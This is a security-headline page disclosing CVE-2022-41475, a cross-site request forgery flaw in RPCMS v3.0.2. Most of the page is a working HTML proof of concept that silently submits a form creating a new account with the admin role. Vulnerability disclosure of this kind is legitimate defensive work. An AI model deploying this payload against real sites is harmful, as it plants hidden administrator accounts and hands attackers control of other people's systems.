Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-41475: There is a CSRF vulnerability that can add an administrator account · Issue #2 · ralap-z/rpcms

RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add an administrator account.

CVE
#csrf#vulnerability
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin/user/doAdd.html" method="POST">
      <input type="hidden" name="username" value="guest" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="nickname" value="guest" />
      <input type="hidden" name="role" value="admin" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="isCheck" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda